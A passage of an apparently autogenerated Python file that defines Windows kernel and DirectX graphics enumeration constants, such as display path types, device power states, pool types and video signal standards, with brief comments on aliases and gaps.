PROFILE_MAP.PMAP_SETUPPROGRAMNAMES = 34
PROFILE_MAP.PMAP_INPUTMETHOD = 35
PROFILE_MAP.PMAP_MOUCLASS_PARAMS = 36
PROFILE_MAP.PMAP_KBDCLASS_PARAMS = 37
PROFILE_MAP.PMAP_COMPUTERNAME = 38
PROFILE_MAP.PMAP_TS = 39
PROFILE_MAP.PMAP_TABLETPC = 40
PROFILE_MAP.PMAP_MEDIACENTER = 41
PROFILE_MAP.PMAP_TS_EXCLUDE_DESKTOP_VERSION = 42
PROFILE_MAP.PMAP_WOW64_COMPAT32 = 43
PROFILE_MAP.PMAP_WOW64_IMECOMPAT = 44
PROFILE_MAP.PMAP_SERVERR2 = 45
PROFILE_MAP.PMAP_STARTER = 46
PROFILE_MAP.PMAP_ACCESS = 47
PROFILE_MAP.PMAP_AUDIODESCRIPTION = 48
PROFILE_MAP.PMAP_CONTROL = 49
PROFILE_MAP.PMAP_LAST = 49  # alias of PMAP_CONTROL: marks the final valid index
# NT product flavor (workstation / DC / server); note this enum starts at 1.
NT_PRODUCT_TYPE = v_enum()
NT_PRODUCT_TYPE.NtProductWinNt = 1
NT_PRODUCT_TYPE.NtProductLanManNt = 2
NT_PRODUCT_TYPE.NtProductServer = 3
DMM_VIDPNCHANGE_TYPE = v_enum()
DMM_VIDPNCHANGE_TYPE.DMM_CVR_UNINITIALIZED = 0
DMM_VIDPNCHANGE_TYPE.DMM_CVR_UPDATEMODALITY = 1
DMM_VIDPNCHANGE_TYPE.DMM_CVR_ADDPATH = 2
DMM_VIDPNCHANGE_TYPE.DMM_CVR_ADDPATHS = 3
DMM_VIDPNCHANGE_TYPE.DMM_CVR_REMOVEPATH = 4
DMM_VIDPNCHANGE_TYPE.DMM_CVR_REMOVEALLPATHS = 5
# Device power states D0 (on) .. D3 (off).
DEVICE_POWER_STATE = v_enum()
DEVICE_POWER_STATE.PowerDeviceUnspecified = 0
DEVICE_POWER_STATE.PowerDeviceD0 = 1
DEVICE_POWER_STATE.PowerDeviceD1 = 2
DEVICE_POWER_STATE.PowerDeviceD2 = 3
DEVICE_POWER_STATE.PowerDeviceD3 = 4
DEVICE_POWER_STATE.PowerDeviceMaximum = 5
# Windows Hardware Error Architecture: hardware error source kinds.
WHEA_ERROR_SOURCE_TYPE = v_enum()
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeMCE = 0
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeCMC = 1
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeCPE = 2
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeNMI = 3
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypePCIe = 4
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeGeneric = 5
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeINIT = 6
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeBOOT = 7
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeSCIGeneric = 8
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFMCA = 9
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFCMC = 10
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFCPE = 11
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeMax = 12
# DirectX graphics kernel diagnostic code points.
# NOTE: value 6 is absent (jumps 5 -> 7), as in the source headers.
DXGK_DIAG_CODE_POINT_TYPE = v_enum()
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_NONE = 0
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RECOMMEND_FUNC_VIDPN = 1
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_OS_RECOMMENDED_VIDPN = 2
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_LOG_FAILURE = 3
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_INVALIDATE_ERROR = 4
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDS_LOG_FAILURE = 5
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDS_FAILURE_DB = 7
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RETRIEVE_BTL = 8
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RETRIEVE_DB = 9
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_QDC_LOG_FAILURE = 10
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_ON_GDI = 11
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_OFF_GDI = 12
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_ON_MONITOR = 13
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_OFF_MONITOR = 14
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_DIM_MONITOR = 15
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_UNDIM_MONITOR = 16
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BACKTRACK = 17
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_CLOSEST_TARGET_MODE = 18
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_NO_EXACT_SOURCE_MODE = 19
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_NO_EXACT_TARGET_MODE = 20
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_SOURCE_MODE_NOT_PINNED = 21
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_TARGET_MODE_NOT_PINNED = 22
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_RESTARTED = 23
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_TDR = 24
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ACPI_EVENT_NOTIFICATION = 25
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEMDEV_USE_DEFAULT_MODE = 26
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CONNECTED_SET_LOG_FAILURE = 27
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_INVALIDATE_DXGK_MODE_CACHE = 28
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_REBUILD_DXGK_MODE_CACHE = 29
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEFUNVIDPN_RELAX_REFRESH_MATCH = 30
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEFUNVIDPN_CCDBML_FAIL_VISTABML_SUCCESSED = 31
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BEST_SOURCE_MODE = 32
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BEST_TARGET_MODE = 33
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ADD_DEVICE = 34
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_START_ADAPTER = 35
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_STOP_ADAPTER = 36
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHILD_POLLING = 37
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHILD_POLLING_TARGET = 38
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_INDICATE_CHILD_STATUS = 39
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_HANDLE_IRP = 40
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHANGE_UNSUPPORTED_MONITOR_MODE_FLAG = 41
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ACPI_NOTIFY_CALLBACK = 42
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_EVICTALL_DISABLEGDI = 43
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_EVICTALL_ENABLEGDI = 44
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_MODESWITCH = 45
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_SYNC_MONITOR_EVENT = 46
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_PNP_NOTIFY_GDI = 47
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_PNP_ENABLE_VGA = 48
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_TDR_SWITCH_GDI = 49
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_CREATE_DEVICE_FAILED = 50
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_DEVICE_REMOVED = 51
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_DRVASSERTMODE_TRUE_FAILED = 52
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_RECREATE_DEVICE_FAILED = 53
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDD_MAPSHADOWBUFFER_FAILED = 54
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_COMMIT_VIDPN_LOG_FAILURE = 55
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DRIVER_RECOMMEND_LOG_FAILURE = 56
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_ENFORCED_CLONE_PATH_INVALID_SOURCE_IDX = 57
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DRVPROBEANDCAPTURE_FAILED = 58
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DXGKCDDENABLE_OPTIMIZED_MODE_CHANGE = 59
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DXGKSETDISPLAYMODE_OPTIMIZED_MODE_CHANGE = 60
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MON_DEPART_GETRECENTTOP_FAIL = 61
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MON_ARRIVE_INC_ADD_FAIL = 62
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CCD_DATABASE_PERSIST = 63
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CCD_DATABASE_PERSIST_NO_CONNECTIVITY_HASH = 64
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MAX = 64  # alias of the last real code point
# -1 sentinel forces the C enum to a 32-bit underlying type; kept verbatim.
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_FORCE_UINT32 = -1
DMM_VIDPN_MONITOR_TYPE = v_enum()
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_UNINITIALIZED = 0
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_PHYSICAL_MONITOR = 1
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_BOOT_PERSISTENT_MONITOR = 2
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_PERSISTENT_MONITOR = 3
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_TEMPORARY_MONITOR = 4
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_SIMULATED_MONITOR = 5
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING = v_enum()
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_UNINITIALIZED = 0
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_PROGRESSIVE = 1
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_INTERLACED_UPPERFIELDFIRST = 2
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_INTERLACED_LOWERFIELDFIRST = 3
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_OTHER = 255
D3DKMDT_MONITOR_ORIENTATION = v_enum()
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_UNINITIALIZED = 0
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_0DEG = 1
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_90DEG = 2
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_180DEG = 3
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_270DEG = 4
# Video output connector types.  Contains intentional duplicates/negatives
# from the header: -2/-1 sentinels, INT_MIN for "internal", and aliased
# legacy names (e.g. SVIDEO_4PIN/SVIDEO_7PIN both 1, BNC/RCA_3COMPONENT both 3).
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY = v_enum()
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UNINITIALIZED = -2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_OTHER = -1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_HD15 = 0
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_COMPOSITE_VIDEO = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_COMPONENT_VIDEO = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DVI = 4
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_HDMI = 5
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_LVDS = 6
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_D_JPN = 8
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SDI = 9
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DISPLAYPORT_EXTERNAL = 10
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DISPLAYPORT_EMBEDDED = 11
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UDI_EXTERNAL = 12
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UDI_EMBEDDED = 13
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SDTVDONGLE = 14
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_INTERNAL = -2147483648
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO_4PIN = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO_7PIN = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_RF = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_RCA_3COMPONENT = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_BNC = 3
# Kernel event dispatcher object kinds.
EVENT_TYPE = v_enum()
EVENT_TYPE.NotificationEvent = 0
EVENT_TYPE.SynchronizationEvent = 1
# Per-processor queued spinlock slot indices.
KSPIN_LOCK_QUEUE_NUMBER = v_enum()
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare0 = 0
KSPIN_LOCK_QUEUE_NUMBER.LockQueueExpansionLock = 1
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare2 = 2
KSPIN_LOCK_QUEUE_NUMBER.LockQueueSystemSpaceLock = 3
KSPIN_LOCK_QUEUE_NUMBER.LockQueueVacbLock = 4
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMasterLock = 5
KSPIN_LOCK_QUEUE_NUMBER.LockQueueNonPagedPoolLock = 6
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoCancelLock = 7
KSPIN_LOCK_QUEUE_NUMBER.LockQueueWorkQueueLock = 8
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoVpbLock = 9
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoDatabaseLock = 10
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoCompletionLock = 11
KSPIN_LOCK_QUEUE_NUMBER.LockQueueNtfsStructLock = 12
KSPIN_LOCK_QUEUE_NUMBER.LockQueueAfdWorkQueueLock = 13
KSPIN_LOCK_QUEUE_NUMBER.LockQueueBcbLock = 14
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMmNonPagedPoolLock = 15
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare16 = 16
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMaximumLock = 17
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_PRIMARY = 1
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SECONDARY = 2
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_TERTIARY = 3
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_QUATERNARY = 4
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_QUINARY = 5
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SENARY = 6
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SEPTENARY = 7
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_OCTONARY = 8
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_NONARY = 9
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_DENARY = 10
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_MAX = 32
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_NOTSPECIFIED = 255
# File-system (volume) information classes for NtQueryVolumeInformationFile.
FSINFOCLASS = v_enum()
FSINFOCLASS.FileFsVolumeInformation = 1
FSINFOCLASS.FileFsLabelInformation = 2
FSINFOCLASS.FileFsSizeInformation = 3
FSINFOCLASS.FileFsDeviceInformation = 4
FSINFOCLASS.FileFsAttributeInformation = 5
FSINFOCLASS.FileFsControlInformation = 6
FSINFOCLASS.FileFsFullSizeInformation = 7
FSINFOCLASS.FileFsObjectIdInformation = 8
FSINFOCLASS.FileFsDriverPathInformation = 9
FSINFOCLASS.FileFsVolumeFlagsInformation = 10
FSINFOCLASS.FileFsMaximumInformation = 11
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE = v_enum()
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_RenderCommandBuffer = 0
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_DeferredCommandBuffer = 1
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SystemCommandBuffer = 2
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_MmIoFlipCommandBuffer = 3
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_WaitCommandBuffer = 4
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SignalCommandBuffer = 5
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_DeviceCommandBuffer = 6
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SoftwareCommandBuffer = 7
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_QueuePacketTypeMax = 8
# Anonymous C enum (no name in the original headers); the generator assigned
# this placeholder identifier.  DMM diagnostic-info version constants.
_unnamed_15459 = v_enum()
_unnamed_15459.DMM_DIAG_INFO_VISTA_BETA2_VERSION = 4097
_unnamed_15459.DMM_DIAG_INFO_VISTA_RC1_VERSION = 4098
_unnamed_15459.DMM_DIAG_INFO_VISTA_RTM_VERSION = 4099
_unnamed_15459.DMM_DIAG_INFO_WIN7_MQ_VERSION = 8192
_unnamed_15459.DMM_DIAG_INFO_WIN7_M3_VERSION = 8193
_unnamed_15459.DMM_DIAG_INFO_VERSION = 8193  # alias: "current" version = WIN7_M3
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_GRAPHICS = 1
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_VIDEO = 2
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_NOTSPECIFIED = 255
THRESHOLD_SELECTOR = v_enum()
THRESHOLD_SELECTOR.ThresholdMouse = 0
THRESHOLD_SELECTOR.ThresholdPen = 1
THRESHOLD_SELECTOR.ThresholdMouseDragOut = 2
THRESHOLD_SELECTOR.ThresholdPenDragOut = 3
THRESHOLD_SELECTOR.ThresholdMouseSideMove = 4
THRESHOLD_SELECTOR.ThresholdPenSideMove = 5
THRESHOLD_SELECTOR.ThresholdAlways = 6
THRESHOLD_SELECTOR.ThresholdLast = 7
# Kernel pool allocation types; the *Session variants are base value + 32.
POOL_TYPE = v_enum()
POOL_TYPE.NonPagedPool = 0
POOL_TYPE.PagedPool = 1
POOL_TYPE.NonPagedPoolMustSucceed = 2
POOL_TYPE.DontUseThisType = 3
POOL_TYPE.NonPagedPoolCacheAligned = 4
POOL_TYPE.PagedPoolCacheAligned = 5
POOL_TYPE.NonPagedPoolCacheAlignedMustS = 6
POOL_TYPE.MaxPoolType = 7
POOL_TYPE.NonPagedPoolSession = 32
POOL_TYPE.PagedPoolSession = 33
POOL_TYPE.NonPagedPoolMustSucceedSession = 34
POOL_TYPE.DontUseThisTypeSession = 35
POOL_TYPE.NonPagedPoolCacheAlignedSession = 36
POOL_TYPE.PagedPoolCacheAlignedSession = 37
POOL_TYPE.NonPagedPoolCacheAlignedMustSSession = 38
DMM_CLIENT_TYPE = v_enum()
DMM_CLIENT_TYPE.DMM_CT_UNINITIALIZED = 0
DMM_CLIENT_TYPE.DMM_CT_CDD_NOPATHDATA = 1
DMM_CLIENT_TYPE.DMM_CT_USERMODE = 2
DMM_CLIENT_TYPE.DMM_CT_CDD_PATHDATA = 3
DMM_CLIENT_TYPE.DMM_CT_DXGPORT = 4
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE = v_enum()
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_ClientRenderBuffer = 0
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_ClientPagingBuffer = 1
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_SystemPagingBuffer = 2
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_SystemPreemptionBuffer = 3
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_DmaPacketTypeMax = 4
# Analog/digital video signal standards (VESA, NTSC/PAL/SECAM variants, EIA).
D3DKMDT_VIDEO_SIGNAL_STANDARD = v_enum()
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_UNINITIALIZED = 0
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_DMT = 1
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_GTF = 2
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_CVT = 3
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_IBM = 4
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_APPLE = 5
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_M = 6
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_J = 7
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_443 = 8
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_B = 9
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_B1 = 10
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_G = 11
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_H = 12
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_I = 13
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_D = 14
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_N = 15
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_NC = 16
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_B = 17
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_D = 18
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_G = 19
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_H = 20
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_K = 21
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_K1 = 22
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_L = 23
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_L1 = 24
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861 = 25
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861A = 26
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861B = 27
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_K = 28
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_K1 = 29
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_L = 30
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_M = 31
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_OTHER = 255
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT = v_enum()
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_UNINITIALIZED = 0
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_ACTIVESIZE = 1
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_MAXPIXELRATE = 2
# Window arrangement commands; MOVE_FIRST/MOVE_LAST bracket the valid range
# (MOVE_FIRST aliases RESTORE_UP at 10).
WINDOW_ARRANGEMENT_COMMAND = v_enum()
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_FIRST = 10
WINDOW_ARRANGEMENT_COMMAND.WARR_RESTORE_UP = 10
WINDOW_ARRANGEMENT_COMMAND.WARR_RESTORE_DOWN = 11
